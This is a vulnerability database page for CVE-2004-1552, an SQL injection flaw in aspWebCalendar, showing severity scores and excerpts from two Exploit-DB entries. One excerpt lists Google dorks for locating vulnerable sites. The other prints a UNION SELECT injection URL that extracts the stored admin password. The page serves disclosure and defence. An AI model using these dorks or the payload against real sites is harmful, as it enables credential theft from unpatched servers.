CVE-2004-1552
published 2004-12-31CVE-2004-1552: SQL injection vulnerability in aspWebCalendar allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2)…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.08%
89.4th percentile
SQL injection vulnerability in aspWebCalendar allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the eventid parameter to calendar.asp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| full_revolution | aspwebcalendar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Web Calendar System 3.12/3.30 - Multiple Vulnerabilities
exploitdb·2008-11-27
CVE-2004-1552 Web Calendar System 3.12/3.30 - Multiple Vulnerabilities
Web Calendar System 3.12/3.30 - Multiple Vulnerabilities
---
000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
[+] Script : Web Calendar System v 3.12/3.30
[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit)
[+] Google Dork : intitle:Web Calendar system v 3.30 inurl:.asp
[+] Google Dork : intitle:Web Calendar system v 3.12 inurl:.asp
[+] Contact : [email protected]
--//--> Exploit :
1) Remote Bypa
Exploit-DB
AspWebCalendar 4.5 - 'eventid' SQL Injection
exploitdb·2007-03-22
CVE-2004-1552 AspWebCalendar 4.5 - 'eventid' SQL Injection
AspWebCalendar 4.5 - 'eventid' SQL Injection
---
# Title : aspWebCalendar Remote SQL Injection Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$ : free
#S.Page : http://fullrevolution.com
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]
Example:
/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config
"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron
"""""""""""""""""""""
www.p4r4d0x.com
# milw0rm.com [2007-03-22]
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=109604910025090&w=2http://secunia.com/advisories/12651http://secunia.com/advisories/24622http://www.securityfocus.com/bid/11246http://www.securityfocus.com/bid/23098http://www.vupen.com/english/advisories/2007/1093https://exchange.xforce.ibmcloud.com/vulnerabilities/17506https://exchange.xforce.ibmcloud.com/vulnerabilities/33157https://www.exploit-db.com/exploits/3546http://marc.info/?l=bugtraq&m=109604910025090&w=2http://secunia.com/advisories/12651http://secunia.com/advisories/24622http://www.securityfocus.com/bid/11246http://www.securityfocus.com/bid/23098http://www.vupen.com/english/advisories/2007/1093https://exchange.xforce.ibmcloud.com/vulnerabilities/17506https://exchange.xforce.ibmcloud.com/vulnerabilities/33157https://www.exploit-db.com/exploits/3546
2004-12-31
Published